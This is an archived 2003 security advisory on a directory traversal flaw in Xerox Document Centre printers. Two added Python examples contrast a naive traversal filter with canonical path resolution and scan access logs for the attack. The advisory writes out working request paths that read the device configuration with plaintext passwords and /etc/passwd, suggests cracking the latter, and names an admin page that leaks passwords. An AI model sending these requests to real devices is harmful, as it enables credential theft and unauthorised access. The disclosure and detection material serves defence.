[NEWS] Security Vulnerability in Xerox Document Centre (Directory Traversal)

From: SecuriTeam (support_at_securiteam.com)
Date: 12/22/03

    To: list@securiteam.com
    Date: 22 Dec 2003 12:28:29 +0200

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

      Security Vulnerability in Xerox Document Centre (Directory Traversal)
    ------------------------------------------------------------------------

    SUMMARY

    A security vulnerability has been found in the Xerox Document Centre. It
    allows remote access to files, disclosure of the plaintext passwords for
    the HTTP administration interface, disclosure of the DES-hashed passwords
    of the operating system, and read-write access to the HTTP users and
    their passwords.

    DETAILS

    Vulnerable systems:
     * Xerox Document Centre 440DC
     * Xerox Document Centre 480DC
     * Xerox Document Centre 425ST
     * Xerox Document Centre 470
     * Xerox Document Centre 255ST

    The web server software on Xerox hardware (it reports itself as
    "Xerox_MicroServer/Xerox11") returns a binary dump of a directory when the
    requested URL ends with "/.." or "/.". Starting from the document root,
    this makes it easy to build the directory and file tree and then retrieve
    any file in it.

    The server does have a directory traversal blocking mechanism in place, so
    a request cannot step back past the document root: the web server appears
    to reject "../" when it would climb too far.

    A request like:
        GET /../..

    Will return "The request had invalid syntax".

    However, requesting "../" on its own will not.

    Therefore a request like:
        GET /assist/.

    Will return an "OK" response.

    What appears to be happening is that the server counts the "../" groups
    and compares that count with the total number of "/" characters in the
    request.

    A request like:
        GET /assist/////.././../../.

    Will in fact return an "OK" response.
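    The following is an added example, not code from the advisory or from
    Xerox. It places a count-based filter modelled on the behaviour described
    above (the exact rule is an assumption: reject only when the number of
    ".." segments reaches the number of other "/" separators) next to a
    canonicalising check that resolves ".", ".." and empty segments one by
    one and refuses any path that would climb above the document root. Run
    over the requests quoted in the advisory, it shows the counting rule
    accepting what the canonical check rejects.

```python
# Added example (not from the advisory or Xerox): a count-based traversal
# filter modelled on the advisory's description, beside a canonicalising
# check that resolves "." and ".." segment by segment.
from typing import Optional


def counting_filter_accepts(path: str) -> bool:
    """Model of the heuristic the advisory describes (an assumption, not
    Xerox's code): reject only when the number of '..' segments reaches
    the number of other '/' separators, i.e. when 2 * dotdots >= slashes."""
    segments = path.split("/")
    dotdots = segments.count("..")
    slashes = path.count("/")
    return 2 * dotdots < slashes


def resolve_within_root(path: str) -> Optional[str]:
    """Canonicalise a request path against the document root.

    Returns the normalised path, or None as soon as a '..' would climb
    above '/'. Empty segments (from '//') and '.' segments are no-ops, so
    padding a request with extra slashes changes nothing."""
    stack = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not stack:
                return None  # attempt to leave the document root
            stack.pop()
            continue
        stack.append(seg)
    return "/" + "/".join(stack)


# Requests quoted in the advisory, plus the admin page it names.
ADVISORY_REQUESTS = [
    "/../..",
    "/assist/.",
    "/assist/////.././../../.",
    "////../../data/config/microsrv.cfg",
    "/srvadmin/usersecure.dhtml",
]


def compare(paths):
    """Map each path to (accepted by counting rule, canonical path or None)."""
    return {p: (counting_filter_accepts(p), resolve_within_root(p)) for p in paths}


if __name__ == "__main__":
    for p, (counted, canon) in compare(ADVISORY_REQUESTS).items():
        verdict = "accept" if counted else "reject"
        print(f"{p:40} counting={verdict:6} canonical={canon}")
```

    The point of the comparison is that any rule which reasons about the
    string as a whole can be padded into accepting a path, whereas resolving
    segments against a stack gives the same answer no matter how many empty
    or "." segments are inserted between the ".." steps.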

    Examples:
    Requesting: http://xerox_dc_470.example.com/..

    Will return:
    00 00 00 00 45 00 0c 00 01 2e 00 00 00 00 00 00 43 ...E...........C
    10 00 0c 00 02 2e 2e 00 00 00 00 00 46 00 10 00 06 ...........F....
    20 63 6f 6e 66 69 67 00 00 00 00 00 48 00 10 00 06 config.....H....
    30 68 74 64 6f 63 73 00 00 00 00 02 26 00 10 00 04 htdocs.....&....
    40 6a 6f 62 73 00 00 00 00 00 00 02 29 01 b8 00 04 jobs.......)....
    50 6c 61 6e 67 00 00 00 00 00 00 00 00 00 00 00 00 lang............
    60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................

    Requesting:
    http://xerox_dc_470.example.com////../../data/config/microsrv.cfg

    Will return the configuration file, including plain text passwords.

    Requesting:
    http://xerox_dc_470.example.com////////../../../../../../etc/passwd

    Will return the passwd file (which you can then run Crack on).

    Even without using "..", the plaintext passwords for the HTTP interface
    can be obtained by requesting:
    http://xerox_dc_470.example.com/srvadmin/usersecure.dhtml

    From that page you can even create new users; pressing the "Apply new
    settings" button prompts for the admin password, which is the same one
    you have just read on that same page.

    Workaround:
     * Disable the HTTP interface
     * Restrict access permissions to trusted hosts
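    Until the HTTP interface can be disabled, the access log is the place to
    look for the request shapes described above. The following is an added
    example, not part of the advisory: it parses common-log-format lines
    (the lines below are constructed, not real device output), flags paths
    that carry ".." or "/." segments or repeated slashes, and reports any
    fetch of the "/srvadmin/" pages from a host outside an assumed trusted
    subnet (10.0.0.0/24 here), which corresponds to the second workaround.

```python
# Added example (not from the advisory): scan web-server access logs for the
# request shapes the advisory describes and for administrative pages fetched
# from hosts outside an allowlist. The log lines and subnet are constructed.
import re
from ipaddress import ip_address, ip_network

TRUSTED_NETS = [ip_network("10.0.0.0/24")]   # assumed administrative subnet
ADMIN_PREFIXES = ("/srvadmin/",)              # admin pages named in the advisory

# Common log format: host ident user [time] "method path proto" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

# Constructed sample log; timestamps follow the advisory's date.
SAMPLE_LOG = [
    '10.0.0.5 - - [22/Dec/2003:12:28:29 +0200] "GET /index.dhtml HTTP/1.0" 200 512',
    '192.0.2.10 - - [22/Dec/2003:12:30:01 +0200] "GET /assist/////.././../../. HTTP/1.0" 200 128',
    '192.0.2.10 - - [22/Dec/2003:12:30:05 +0200] "GET ////../../data/config/microsrv.cfg HTTP/1.0" 200 2048',
    '192.0.2.10 - - [22/Dec/2003:12:31:00 +0200] "GET /srvadmin/usersecure.dhtml HTTP/1.0" 200 4096',
    '10.0.0.5 - - [22/Dec/2003:12:32:00 +0200] "GET /srvadmin/usersecure.dhtml HTTP/1.0" 200 4096',
]


def suspicious_path(path: str) -> list:
    """Return the reasons a request path looks like traversal or a
    directory dump; an empty list means the path is unremarkable."""
    reasons = []
    segs = path.split("?", 1)[0].split("/")
    if ".." in segs:
        reasons.append("dot-dot segment")
    if "." in segs[1:]:          # a '/.' component; trailing '/.' dumps a directory
        reasons.append("single-dot segment")
    if "//" in path:             # padding slashes, as in the advisory's requests
        reasons.append("repeated slash")
    return reasons


def scan(lines, trusted=TRUSTED_NETS):
    """Return (source, path, status, reasons) for every flagged request."""
    findings = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue             # skip lines that are not in common log format
        src, method, path, status = m.groups()
        reasons = suspicious_path(path)
        if path.startswith(ADMIN_PREFIXES) and not any(ip_address(src) in n for n in trusted):
            reasons.append("admin page from untrusted host")
        if reasons:
            findings.append((src, path, int(status), reasons))
    return findings


if __name__ == "__main__":
    for src, path, status, reasons in scan(SAMPLE_LOG):
        print(f"{src:12} {status} {path:40} {', '.join(reasons)}")
```

    A 200 status on a flagged path is the signal worth alerting on: the
    advisory shows the server answering "OK" to exactly these requests, so
    a rejected request (an error status) is an attempt, while an accepted
    one is a disclosure.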

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:spd@shiva.cps.unizar.es>
    J.A. Gutierrez and <mailto:brandonp@insynclh.com> brandon pierce.


